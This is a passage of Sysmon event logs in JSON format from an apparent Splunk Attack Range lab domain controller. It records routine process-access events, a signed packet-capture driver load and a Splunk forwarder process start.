C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:56.426","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4084,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:56.426\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:56.426","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4085,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:56.426\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:56.426","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4086,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:56.426\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:56.426","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4087,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:56.426\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:56.426","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4088,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:56.426\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-0010F6780500}\r\nSourceProcessId: 3336\r\nSourceThreadId: 1980\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-110C-5F25-0000-0010A0E80500}\r\nTargetProcessId: 2664\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:56.426","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010F6780500}","SourceProcessId":"3336","SourceThreadId":"1980","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-110C-5F25-0000-0010A0E80500}","TargetProcessId":"2664","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4089,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:56.426\r\nSourceProcessGUID: {E2A3D6B1-110B-5F25-0000-00104ED30500}\r\nSourceProcessId: 3884\r\nSourceThreadId: 2328\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\streamfwd.exe\r\nTargetProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nTargetProcessId: 1828\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x100000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\streamfwd.exe+201f2b|C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\streamfwd.exe+a6c153|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:56.426","SourceProcessGUID":"{E2A3D6B1-110B-5F25-0000-00104ED30500}","SourceProcessId":"3884","SourceThreadId":"2328","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\streamfwd.exe","TargetProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","TargetProcessId":"1828","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x100000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\streamfwd.exe+201f2b|C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\streamfwd.exe+a6c153|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4090,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:56.520\r\nSourceProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nSourceProcessId: 1336\r\nSourceThreadId: 1048\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x100000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\cryptsvc.dll+6124|c:\\windows\\system32\\cryptsvc.dll+5e34|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:56.520","SourceProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","SourceProcessId":"1336","SourceThreadId":"1048","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x100000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\cryptsvc.dll+6124|c:\\windows\\system32\\cryptsvc.dll+5e34|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":6,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":6,"OpcodeValue":0,"RecordNumber":4091,"ProcessID":2928,"ThreadID":3412,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Driver loaded:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:56.426\r\nImageLoaded: C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\npf.sys\r\nHashes: MD5=DE7FCC77F4A503AF4CA6A47D49B3713D,SHA256=4BFAA99393F635CD05D91A64DE73EDB5639412C129E049F0FE34F88517A10FC6,IMPHASH=CB86059F4B291991E735BECBD4C669CB\r\nSigned: true\r\nSignature: Riverbed Technology, Inc.\r\nSignatureStatus: Valid","Category":"Driver loaded (rule: DriverLoad)","Opcode":"Info","UtcTime":"2020-08-01 06:51:56.426","ImageLoaded":"C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\npf.sys","Hashes":"MD5=DE7FCC77F4A503AF4CA6A47D49B3713D,SHA256=4BFAA99393F635CD05D91A64DE73EDB5639412C129E049F0FE34F88517A10FC6,IMPHASH=CB86059F4B291991E735BECBD4C669CB","Signed":"true","Signature":"Riverbed Technology, Inc.","SignatureStatus":"Valid","EventReceivedTime":"2020-08-01 06:51:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4092,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:57.100\r\nProcessGuid: {E2A3D6B1-110D-5F25-0000-001022EE0500}\r\nProcessId: 3044\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nFileVersion: 8.0.2\r\nDescription: Active Directory monitor\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-admon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 